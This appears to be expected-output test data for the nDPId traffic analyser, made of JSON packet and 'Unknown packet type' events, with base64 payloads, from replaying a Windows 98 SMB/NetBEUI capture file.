00510{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":79,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":155,"pkt_type":141,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":155,"pkt_l4_len":0,"thread_ts_msec":1576409851581,"pkt":"AFBWM3ieAAwp1HmyAI3w8AQEDgD\/7xYMAAAoAAIAFQP\/U01CcwAAAAAQAAAAAAAAAAAAAAAAAAAAAAAyAQAhAAp1AEcAPgYCAAAAFQUDgAEAAAAAABAAAE1BUlRJTiBST1NFTkFVAAT\/AAAAAAAYACkANLVcqnsYd8yVvD05\/JKBnmi3H4Zsvi3FXFxNREpSOThcVEVTVABBOgA="} 00496{"packet_event_id":1,"packet_event_name":"packet","packet_id":79,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":155,"pkt_type":141,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":155,"pkt_l4_len":0,"thread_ts_msec":1576409851581,"pkt":"AFBWM3ieAAwp1HmyAI3w8AQEDgD\/7xYMAAAoAAIAFQP\/U01CcwAAAAAQAAAAAAAAAAAAAAAAAAAAAAAyAQAhAAp1AEcAPgYCAAAAFQUDgAEAAAAAABAAAE1BUlRJTiBST1NFTkFVAAT\/AAAAAAAYACkANLVcqnsYd8yVvD05\/JKBnmi3H4Zsvi3FXFxNREpSOThcVEVTVABBOgA="}
00211{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":79,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":141,"global_ts_msec":1576409859030} 00197{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":79,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":141,"global_ts_msec":1576409859030}
00375{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":80,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":4,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1576409851581,"pkt":"AAwp1HmyAFBWM3ieAATw8QEGAP\/vAAAAAAAAFAAAAAAAAAAAAAAAAAAAAAAAV09SS0dST1VQICAgICAg"} 00361{"packet_event_id":1,"packet_event_name":"packet","packet_id":80,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":4,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1576409851581,"pkt":"AAwp1HmyAFBWM3ieAATw8QEGAP\/vAAAAAAAAFAAAAAAAAAAAAAAAAAAAAAAAV09SS0dST1VQICAgICAg"}
00209{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":80,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":4,"global_ts_msec":1576409859030} 00195{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":80,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":4,"global_ts_msec":1576409859030}
00410{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":81,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":83,"pkt_type":69,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":83,"pkt_l4_len":0,"thread_ts_msec":1576409851581,"pkt":"AAwp1HmyAFBWM3ieAEXw8AQGDgD\/7xYMAAACACgAAxX\/U01CcwAAAACQAAAAAAAAAAAAAAAAAAAAyAAyAAAhAAN1ACkAAAAAAAL\/AAAAAwBBOgA="} 00396{"packet_event_id":1,"packet_event_name":"packet","packet_id":81,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":83,"pkt_type":69,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":83,"pkt_l4_len":0,"thread_ts_msec":1576409851581,"pkt":"AAwp1HmyAFBWM3ieAEXw8AQGDgD\/7xYMAAACACgAAxX\/U01CcwAAAACQAAAAAAAAAAAAAAAAAAAAyAAyAAAhAAN1ACkAAAAAAAL\/AAAAAwBBOgA="}
00210{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":81,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":69,"global_ts_msec":1576409859030} 00196{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":81,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":69,"global_ts_msec":1576409859030}
00375{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":82,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":4,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1576409851581,"pkt":"AFBWM3ieAAwp1HmyAATw8QEGAP\/vCgADAAAAAwBNREpSOTggICAgICAgICAgVEVTVDEgICAgICAgICAg"} 00361{"packet_event_id":1,"packet_event_name":"packet","packet_id":82,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":4,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1576409851581,"pkt":"AFBWM3ieAAwp1HmyAATw8QEGAP\/vCgADAAAAAwBNREpSOTggICAgICAgICAgVEVTVDEgICAgICAgICAg"}
00209{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":82,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":4,"global_ts_msec":1576409859030} 00195{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":82,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":4,"global_ts_msec":1576409859030}
00401{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":83,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":76,"pkt_type":62,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":76,"pkt_l4_len":0,"thread_ts_msec":1576409851581,"pkt":"AFBWM3ieAAwp1HmyAD7w8AYGDgD\/7xYMAAAoAAMAFQP\/U01CKwAAAAAAAAAAAAAAAAAAAAAAAAAAyAAyAABhAAEBAAcABEhlbGxvAA=="} 00387{"packet_event_id":1,"packet_event_name":"packet","packet_id":83,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":76,"pkt_type":62,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":76,"pkt_l4_len":0,"thread_ts_msec":1576409851581,"pkt":"AFBWM3ieAAwp1HmyAD7w8AYGDgD\/7xYMAAAoAAMAFQP\/U01CKwAAAAAAAAAAAAAAAAAAAAAAAAAAyAAyAABhAAEBAAcABEhlbGxvAA=="}
00210{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":83,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":62,"global_ts_msec":1576409859030} 00196{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":83,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":62,"global_ts_msec":1576409859030}
00375{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":84,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":4,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1576409851581,"pkt":"AAwp1HmyAFBWM3ieAATw8QEIEQAAAIARyLrAqO+BwKjv\/wCJAIkATHuvAAIpEAABAAAAAAABIEZIRVBG"} 00361{"packet_event_id":1,"packet_event_name":"packet","packet_id":84,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":4,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1576409851581,"pkt":"AAwp1HmyAFBWM3ieAATw8QEIEQAAAIARyLrAqO+BwKjv\/wCJAIkATHuvAAIpEAABAAAAAAABIEZIRVBG"}
00209{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":84,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":4,"global_ts_msec":1576409859030} 00195{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":84,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":4,"global_ts_msec":1576409859030}
00401{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":85,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":76,"pkt_type":62,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":76,"pkt_l4_len":0,"thread_ts_msec":1576409851581,"pkt":"AAwp1HmyAFBWM3ieAD7w8AYIDgD\/7xYMAAADACgAAxX\/U01CKwAAAACAAAAAAAAAAAAAAAAAAAAAyAAyAABhAAEBAAcABEhlbGxvAA=="} 00387{"packet_event_id":1,"packet_event_name":"packet","packet_id":85,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":76,"pkt_type":62,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":76,"pkt_l4_len":0,"thread_ts_msec":1576409851581,"pkt":"AAwp1HmyAFBWM3ieAD7w8AYIDgD\/7xYMAAADACgAAxX\/U01CKwAAAACAAAAAAAAAAAAAAAAAAAAAyAAyAABhAAEBAAcABEhlbGxvAA=="}
00210{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":85,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":62,"global_ts_msec":1576409859030} 00196{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":85,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":62,"global_ts_msec":1576409859030}
00376{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":86,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":4,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1576409851581,"pkt":"AFBWM3ieAAwp1HmyAATw8QEIAP\/vAAAAAAAAAgAEuP7\/UOih91uNRuQWUOhaV09SS0dST1VQICAgICAg"} 00362{"packet_event_id":1,"packet_event_name":"packet","packet_id":86,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":4,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1576409851581,"pkt":"AFBWM3ieAAwp1HmyAATw8QEIAP\/vAAAAAAAAAgAEuP7\/UOih91uNRuQWUOhaV09SS0dST1VQICAgICAg"}
00209{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":86,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":4,"global_ts_msec":1576409859031} 00195{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":86,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":4,"global_ts_msec":1576409859031}
00377{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":87,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":18,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1576409851581,"pkt":"AFBWM3ieAAwp1HmyABLw8AgJDgD\/7xQAAAAoAAAAFQP\/U01CcwAAAAAQAAAAAAAAAAAAAAAAAAAAAAAy"} 00363{"packet_event_id":1,"packet_event_name":"packet","packet_id":87,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":18,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1576409851581,"pkt":"AFBWM3ieAAwp1HmyABLw8AgJDgD\/7xQAAAAoAAAAFQP\/U01CcwAAAAAQAAAAAAAAAAAAAAAAAAAAAAAy"}
00210{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":87,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":18,"global_ts_msec":1576409859141} 00196{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":87,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":18,"global_ts_msec":1576409859141}
00375{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":88,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":4,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1576409851581,"pkt":"AAwp1HmyAFBWM3ieAATw8QELEwAAAIARxrrAqO+BwKjv\/wCJAIkATA22AAYpEAABAAAAAAABIEVORUVF"} 00361{"packet_event_id":1,"packet_event_name":"packet","packet_id":88,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":4,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1576409851581,"pkt":"AAwp1HmyAFBWM3ieAATw8QELEwAAAIARxrrAqO+BwKjv\/wCJAIkATA22AAYpEAABAAAAAAABIEVORUVF"}
00209{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":88,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":4,"global_ts_msec":1576409859141} 00195{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":88,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":4,"global_ts_msec":1576409859141}
00472{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":89,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":115,"pkt_type":101,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":115,"pkt_l4_len":0,"thread_ts_msec":1576409851581,"pkt":"\/\/\/\/\/\/\/\/AAwp1HmyAGXg4AP\/\/wBiABQAAAAA\/\/\/\/\/\/\/\/BVEAAAAAAAwp1HmyBVIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAPMBAYBNREpSOTggICAgICAgICAgVEVTVDEgICAgICAgICAgAA=="} 00458{"packet_event_id":1,"packet_event_name":"packet","packet_id":89,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":115,"pkt_type":101,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":115,"pkt_l4_len":0,"thread_ts_msec":1576409851581,"pkt":"\/\/\/\/\/\/\/\/AAwp1HmyAGXg4AP\/\/wBiABQAAAAA\/\/\/\/\/\/\/\/BVEAAAAAAAwp1HmyBVIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAPMBAYBNREpSOTggICAgICAgICAgVEVTVDEgICAgICAgICAgAA=="}
00211{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":89,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":101,"global_ts_msec":1576409859529} 00197{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":89,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":101,"global_ts_msec":1576409859529}
00472{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":90,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":115,"pkt_type":101,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":115,"pkt_l4_len":0,"thread_ts_msec":1576409851581,"pkt":"\/\/\/\/\/\/\/\/AAwp1HmyAGXg4AP\/\/wBiABQAAAAA\/\/\/\/\/\/\/\/BVEAAAAAAAwp1HmyBVIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAPMBAYBNREpSOTggICAgICAgICAgVEVTVDEgICAgICAgICAgAA=="} 00458{"packet_event_id":1,"packet_event_name":"packet","packet_id":90,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":115,"pkt_type":101,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":115,"pkt_l4_len":0,"thread_ts_msec":1576409851581,"pkt":"\/\/\/\/\/\/\/\/AAwp1HmyAGXg4AP\/\/wBiABQAAAAA\/\/\/\/\/\/\/\/BVEAAAAAAAwp1HmyBVIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAPMBAYBNREpSOTggICAgICAgICAgVEVTVDEgICAgICAgICAgAA=="}
00211{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":90,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":101,"global_ts_msec":1576409860077} 00197{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":90,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":101,"global_ts_msec":1576409860077}
00472{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":91,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":115,"pkt_type":101,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":115,"pkt_l4_len":0,"thread_ts_msec":1576409851581,"pkt":"\/\/\/\/\/\/\/\/AAwp1HmyAGXg4AP\/\/wBiABQAAAAA\/\/\/\/\/\/\/\/BVEAAAAAAAwp1HmyBVIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAPMBAYBNREpSOTggICAgICAgICAgVEVTVDEgICAgICAgICAgAA=="} 00458{"packet_event_id":1,"packet_event_name":"packet","packet_id":91,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":115,"pkt_type":101,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":115,"pkt_l4_len":0,"thread_ts_msec":1576409851581,"pkt":"\/\/\/\/\/\/\/\/AAwp1HmyAGXg4AP\/\/wBiABQAAAAA\/\/\/\/\/\/\/\/BVEAAAAAAAwp1HmyBVIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAPMBAYBNREpSOTggICAgICAgICAgVEVTVDEgICAgICAgICAgAA=="}
00211{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":91,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":101,"global_ts_msec":1576409860625} 00197{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":91,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":101,"global_ts_msec":1576409860625}
00472{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":92,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":115,"pkt_type":101,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":115,"pkt_l4_len":0,"thread_ts_msec":1576409851581,"pkt":"\/\/\/\/\/\/\/\/AAwp1HmyAGXg4AP\/\/wBiABQAAAAA\/\/\/\/\/\/\/\/BVEAAAAAAAwp1HmyBVIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAPMBAYBNREpSOTggICAgICAgICAgVEVTVDEgICAgICAgICAgAA=="} 00458{"packet_event_id":1,"packet_event_name":"packet","packet_id":92,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":115,"pkt_type":101,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":115,"pkt_l4_len":0,"thread_ts_msec":1576409851581,"pkt":"\/\/\/\/\/\/\/\/AAwp1HmyAGXg4AP\/\/wBiABQAAAAA\/\/\/\/\/\/\/\/BVEAAAAAAAwp1HmyBVIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAPMBAYBNREpSOTggICAgICAgICAgVEVTVDEgICAgICAgICAgAA=="}
00211{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":92,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":101,"global_ts_msec":1576409861175} 00197{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":92,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":101,"global_ts_msec":1576409861175}
00694{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":93,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1576409861597,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":219,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":219,"pkt_l4_len":185,"thread_ts_msec":1576409861597,"pkt":"\/\/\/\/\/\/\/\/AFBWM3ieCABFAADNJgAAAIARs03AqO+BwKjv\/wCKAIoAuRxEEQIAEMCo74EAigCjAAAgRU5FRUVLRkNESkRJQ0FDQUNBQ0FDQUNBQ0FDQUNBQ0EAIEZIRVBGQ0VMRUhGQ0VQRkZGQUNBQ0FDQUNBQ0FDQUJOAP9TTUIlAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQAACQAAAAAAAAAAAAAAAAAAAAAAAAAJAFYAAwABAAEAAgAaAFxNQUlMU0xPVFxCUk9XU0UAAgBNREpSOTgA"} 00694{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":93,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1576409861597,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":219,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":219,"pkt_l4_len":185,"thread_ts_msec":1576409861597,"pkt":"\/\/\/\/\/\/\/\/AFBWM3ieCABFAADNJgAAAIARs03AqO+BwKjv\/wCKAIoAuRxEEQIAEMCo74EAigCjAAAgRU5FRUVLRkNESkRJQ0FDQUNBQ0FDQUNBQ0FDQUNBQ0EAIEZIRVBGQ0VMRUhGQ0VQRkZGQUNBQ0FDQUNBQ0FDQUJOAP9TTUIlAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQAACQAAAAAAAAAAAAAAAAAAAAAAAAAJAFYAAwABAAEAAgAaAFxNQUlMU0xPVFxCUk9XU0UAAgBNREpSOTgA"}
00539{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":94,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":180,"pkt_type":166,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":180,"pkt_l4_len":0,"thread_ts_msec":1576409861597,"pkt":"AwAAAAABAFBWM3ieAKbw8AMsAP\/vCAAAAAAAAABXT1JLR1JPVVAgICAgICAdTURKUjk4ICAgICAgICAgAP9TTUIlAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQAAIQAAAAAAAAAAAAAAAAAAAAAAAAAhAFYAAwABAAEAAgAyAFxNQUlMU0xPVFxCUk9XU0UAAQRg6gAATURKUjk4AAAAAAAAAAAAAAQAAyBBABUEVaoA"} 00525{"packet_event_id":1,"packet_event_name":"packet","packet_id":94,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":180,"pkt_type":166,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":180,"pkt_l4_len":0,"thread_ts_msec":1576409861597,"pkt":"AwAAAAABAFBWM3ieAKbw8AMsAP\/vCAAAAAAAAABXT1JLR1JPVVAgICAgICAdTURKUjk4ICAgICAgICAgAP9TTUIlAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQAAIQAAAAAAAAAAAAAAAAAAAAAAAAAhAFYAAwABAAEAAgAyAFxNQUlMU0xPVFxCUk9XU0UAAQRg6gAATURKUjk4AAAAAAAAAAAAAAQAAyBBABUEVaoA"}
00211{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":94,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":166,"global_ts_msec":1576409862195} 00197{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":94,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":166,"global_ts_msec":1576409862195}
00507{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":95,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":156,"pkt_type":142,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":156,"pkt_l4_len":0,"thread_ts_msec":1576409861597,"pkt":"AwAAAAABAFBWM3ieAI7w8AMsAP\/vCAAAAAAAAABXT1JLR1JPVVAgICAgICAdTURKUjk4ICAgICAgICAgIP9TTUIlAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQAACQAAAAAAAAAAAAAAAAAAAAAAAAAJAFYAAwABAAEAAgAaAFxNQUlMU0xPVFxCUk9XU0UAAgBNREpSOTgA"} 00493{"packet_event_id":1,"packet_event_name":"packet","packet_id":95,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":156,"pkt_type":142,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":156,"pkt_l4_len":0,"thread_ts_msec":1576409861597,"pkt":"AwAAAAABAFBWM3ieAI7w8AMsAP\/vCAAAAAAAAABXT1JLR1JPVVAgICAgICAdTURKUjk4ICAgICAgICAgIP9TTUIlAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQAACQAAAAAAAAAAAAAAAAAAAAAAAAAJAFYAAwABAAEAAgAaAFxNQUlMU0xPVFxCUk9XU0UAAgBNREpSOTgA"}
00211{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":95,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":142,"global_ts_msec":1576409866206} 00197{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":95,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":142,"global_ts_msec":1576409866206}
00421{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":97,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":89,"pkt_type":75,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":89,"pkt_l4_len":0,"thread_ts_msec":1576409867606,"pkt":"AFBWM3ieAAwp1HmyAEvw8AoIDgD\/7xYEAAAAAAQAFQP\/U01CgQAAAAAAAAAAAAAAAAAAAAAAAAAAyHUFAACBAAIUAAgAEgAEXD8\/Pz8\/Pz8\/Lj8\/PwAFAAA="} 00407{"packet_event_id":1,"packet_event_name":"packet","packet_id":97,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":89,"pkt_type":75,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":89,"pkt_l4_len":0,"thread_ts_msec":1576409867606,"pkt":"AFBWM3ieAAwp1HmyAEvw8AoIDgD\/7xYEAAAAAAQAFQP\/U01CgQAAAAAAAAAAAAAAAAAAAAAAAAAAyHUFAACBAAIUAAgAEgAEXD8\/Pz8\/Pz8\/Lj8\/PwAFAAA="}
00210{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":97,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":75,"global_ts_msec":1576409868734} 00196{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":97,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":75,"global_ts_msec":1576409868734}
